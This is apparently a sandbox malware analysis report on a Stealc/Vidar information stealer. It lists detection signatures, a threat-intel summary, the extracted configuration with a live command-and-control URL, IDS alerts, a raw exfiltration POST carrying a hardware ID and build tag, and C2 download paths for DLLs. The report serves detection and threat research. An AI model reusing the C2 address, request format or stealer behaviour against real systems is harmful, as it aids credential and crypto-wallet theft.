Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1523481
MD5:	6be29c7d09b8a432f22ad1af2e94ab69
SHA1:	d677e36581d3772e6a4cef3978e2566f7369b1d6
SHA256:	8feb29e2e21519c5fe6d92999271bf4419c896d19b4a514f6cac5dfbbd6005d1
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6BE29C7D09B8A432F22AD1AF2E94AB69)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2040063346.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2238243370.000000000137E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 1476	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 1476	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 1476	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 1476	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.a0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T16:49:58.733313+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T16:49:58.726534+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T16:49:58.949560+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T16:50:00.059613+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T16:49:58.956811+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T16:49:58.502724+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T16:50:00.293208+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:05.229038+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:06.320403+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:06.970382+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:07.508611+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:10.186303+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:10.450224+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 42 46 42 31 43 33 39 30 43 32 32 32 38 33 38 34 32 30 38 31 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 2d 2d 0d 0a Data Ascii: ------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="hwid"9BFB1C390C222838420810------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="build"doma------CBKJEGCBKKJECBGCGDBA--

Source: file.exe, 00000000.00000002.2238243370.000000000137E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllo
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dlls
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dlla
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2238243370.00000000013C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll:
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllr
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dlle
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(
Source: file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
Source: file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpATE
Source: file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpGO
Source: file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH;
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpJ$S
Source: file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT
Source: file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
Source: file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpp
Source: file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phppey
Source: file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
Source: file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phprname
Source: file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpse
Source: file.exe, 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2268891317.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://support.mozilla.org
Source: JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2199205822.000000002FDA0000.00000004.00000020.00020000.00000000.sdmp, JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2199205822.000000002FDA0000.00000004.00000020.00020000.00000000.sdmp, JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
